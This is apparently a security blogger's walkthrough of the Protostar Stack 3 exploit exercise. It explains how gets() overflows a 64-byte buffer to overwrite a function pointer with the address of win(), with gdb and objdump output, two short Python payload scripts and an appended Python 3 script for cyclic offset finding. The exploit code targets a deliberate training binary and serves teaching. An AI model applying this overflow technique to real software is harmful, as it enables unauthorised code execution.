[ExpDev] Exploit Exercise | Protostar | Stack 3

Stack 3

The goal of this challenge is to find the address of the win() func and overwrite the function pointer stored on the stack via a BOF so that it points there. The challenge page also talks about environment variables, but the solution below only needs the address of win().

  • gets(buffer);: The vulnerable func. It reads a line from stdin without checking the size of the destination buffer, so a long line overruns it → BOF.
  • win(): Winning func. Once we overflow the buffer via gets(), we overwrite the function pointer that main() calls with the address of win(), which prints the winning statement.
  • char buffer[64];: The buffer is 64 bytes. Anything past 64 bytes spills into whatever sits above it on the stack, which here is the function pointer.

Exploit

As the challenge page hints, we can find the address of win() with gdb or objdump.

[GDB]
$ gdb -q stack3
(gdb) x win
0x8048424 <win>: 0x83e58955
[objdump]
$ objdump -t stack3 |grep win
08048424 g F .text 00000014 win

Let’s create the following exploit with python:

[Exploit-1]
#!/usr/bin/python
# Stage 1: find the offset from the start of buffer to the function pointer.
padding = "A" * 60                  # 60 bytes of padding
padding += "BBBBCCCCDDDDEEEEFFFF"   # distinct 4-byte markers so we can tell which group lands in the pointer

print padding

When we pipe this into stack3, the program reports that it is calling the function pointer and jumping to 0x43434343 (0x43 = 'C'), so the CCCC group is what landed in the pointer.

So our offset value is 64 (60 A's + BBBB).

We have everything we need: offset value (=64) + address location for win() (=0x08048424).

[Exploit-2]
#!/usr/bin/python
# Stage 2: 64 bytes of padding, then the address of win() = 0x08048424.
padding = "A" * 64
padding += "\x24\x84\x04\x08"   # little-endian, because x86 stores the pointer least-significant byte first
print padding

When we pipe this into stack3 (python exploit.py | ./stack3), the function pointer now holds the address of win(), and the program prints the winning statement.
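The offset-finding and payload steps above, as an added example in Python 3 that is not part of the original post: it replaces the hand-picked BBBBCCCC markers with a cyclic pattern (so any reported 32-bit value maps to exactly one offset), packs the address with struct instead of a hand-typed little-endian string, and rejects a payload containing 0x0a, which gets() would stop at. WIN_ADDR is the value the post found with objdump; the reported value 0x63413163 in the usage comment is constructed for illustration.

```python
#!/usr/bin/env python3
# Added example, not the original post's code. Generalises the post's
# "BBBBCCCCDDDD..." marker trick to a cyclic pattern, recovers the offset
# from the value stack3 reports jumping to, and builds the final payload.
import string
import struct
import sys

# Address of win() as found with objdump/gdb in the post.
WIN_ADDR = 0x08048424


def cyclic(length):
    """Metasploit-style pattern Aa0Aa1Aa2...: every 4-byte window is unique,
    so a reported 32-bit value maps to exactly one offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested pattern length exceeds 20280 bytes")


def find_offset(pattern, reported_value):
    """Locate the bytes of the value the program printed (0x43434343 in the
    post) inside the pattern. The value is packed little-endian because that
    is how the x86 stack stores the function pointer."""
    needle = struct.pack("<I", reported_value)
    offset = pattern.find(needle)
    if offset < 0:
        raise ValueError("reported value not found in pattern")
    return offset


def build_payload(offset, target):
    """Padding up to the function pointer, then the target address."""
    payload = b"A" * offset + struct.pack("<I", target)
    # gets() stops at the first newline, so an address containing 0x0a
    # would be cut off before it reached the function pointer.
    if b"\n" in payload:
        raise ValueError("payload contains 0x0a; gets() would cut it short")
    return payload


if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.argv[1] == "pattern":
        # Stage 1: python3 exploit.py pattern | ./stack3   (note the reported address)
        sys.stdout.buffer.write(cyclic(100) + b"\n")
    else:
        # Stage 2: python3 exploit.py 0x63413163 | ./stack3
        # (with no argument, fall back to the offset of 64 found in the post)
        if len(sys.argv) > 1:
            offset = find_offset(cyclic(100), int(sys.argv[1], 16))
        else:
            offset = 64
        sys.stdout.buffer.write(build_payload(offset, WIN_ADDR) + b"\n")
```

The payload is written through sys.stdout.buffer so the raw address bytes reach the program unchanged; printing a str would re-encode 0x84 as UTF-8 and shift the pointer.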

Thanks for reading!

  • Stack 4 — Stack-based BOF: Basic 4

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security
